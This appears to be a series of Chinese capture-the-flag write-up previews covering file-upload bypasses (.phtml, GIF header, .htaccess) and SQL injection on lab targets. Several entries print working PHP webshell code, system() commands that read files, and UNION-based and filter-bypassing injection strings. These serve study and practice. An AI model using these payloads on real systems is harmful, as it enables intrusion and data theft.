启动靶机，发现有前端验证先绕过前端验证，在burp中尝试发现验证在文件名后缀，且会重命名文件名发现.ini能上传但是会被重命名，既然不像前端显示只有三种格式能上传，这里我们寻找能绕过的后缀尝试发现phtml能上传成功//PHTML扩展名是PHP的一个模块，它允许在HTML文件中使用PHP代码，并且可以将PHP代码和HTML代码合并到一个文件中。写入后门代码也不会被过滤cmd=system('ls../../../../');查找到flag位置最后读取flagcmd=system('cat../../../../flag'); flag{df69440c-0327-4e56-86a2-73c94...

打开靶机，发现php后缀被过滤且发现没有文件包含漏洞 发现.phtml能绕过后缀检测，又显示没有图片//PHTML扩展名是PHP的一个模块，它允许在HTML文件中使用PHP代码，并且可以将PHP代码和HTML代码合并到一个文件中。 尝试在图片中加入gif文件头GIF89a发现能成功上传 尝试写入后门代码显示<?被过滤 我们尝试另一种写法来绕过 <scriptlanguage="php">eval($_POST['cmd']);</script> 成功上传 访问/upload/1.phtmlpost提交cmd=system('ls../../../../');找到...

打开靶机，上传文件抓包 后缀不能带ph，大小写也无法绕过，意味着phtml后缀也无法上传 对后缀只过滤ph，我们转变思路上传图片马，用.htaccess使图片马以php格式打开 上传图片马 上传失败，试一试过滤了哪些字符 文件内容过滤了<? 我们尝试另一种写法后成功上传<scriptlanguage="php">eval($_POST['cmd']);</script>再上传.htaccessAddTypeapplication/x-httpd-php.jpg 上传成功 查找flag过程中发现system函数被禁用，我们使用蚁剑连接 查询flagflag{dbcf...

打开靶机抓包发现过滤代码发现.htaccess能上传后传入图片马 发现内容对<?进行过滤我们换一种方式写后门代码<scriptlanguage="php">eval($_POST['cmd']);</script> 写入成功后发现没有回显 查资料发现可能使由于php版本过高不支持<scriptlanguage="php">eval($_POST['cmd']);</script> 我们只能将注入语句编码后，在.htaccess配置文件中对文件进行解码<?php@eval($_POST[1]);?>编码为：PD9waHAgQGV2...

启动靶机作者不建议使用sqlmap我们这里就进行手工注入用万能口令登录admin'or1=1，详情见上文(https://www.cnblogs.com/m1saka1/p/18411197)登录成功获得用户名和密码，发现密码并没有卵用，只能换思路利用账号密码的回显页面进行sql注入爆破数据库由于网站自动转义，为了方便观看过程所以这里直接用登录界面演示admin'and1=2orderby4出现报错信息 说明数据库有3个字段 `admin'and1=2unionselect1,2,3' 获得回显位2，3获得当前版本号admin'and1=2unionselect1,database(),ver...

启动靶机熟悉的界面 测试发现or被过滤且输入号无法起到注释作用 猜测本靶机考点过滤查询关键词语句or,union,select,and,by和注释符 测试后查询关键词发现过滤只是单次过滤可以使用aandnd,oorr,uunionnion等绕过过滤 而则可以用urlencode编码格式变成%23绕过，接下来我们进行常规构造语句绕过 报错说明有3个字段?username=admin'aandnd1=2oorrderbbyy4%23&password=123 测得回显点位2，3?username=admin'aandnd1=2uunionnionsselectelect1,2,3%23&...

启动靶机 很明显注入点为id值，单引号闭合影响语句，说明为单引号闭合 构造注入语句?id=1'and1=1--+发现没报错，说明没有其他过滤，开始sql注入?id=1'orderby4--+直到=4报错说明有3个字节段测试回显位2，3?id=1'and1=2unionselect1,2,3--+测试当前数据库名note，版本MariaDB-1ubuntu0.14.04.1?id=1'and1=2unionselect1,database(),version()--+获得表名fl4g,notes?id=1'and1=2unionselect1,2,group_concat(table_name)...

启动靶机，查看源码发现注入点只有登录框首先测试查询是用单引号闭合还是双引号闭合，如图 显示查询没有报错，说明不是双引号闭合，接下来测试单引号查询语句报错说明数值代入数据库查询是由单引号闭合，尝试构建万能语句绕过验证admin'or1=1获取flagflag{9d3c2f2d-a1fe-4a71-ab01-9b880a392634}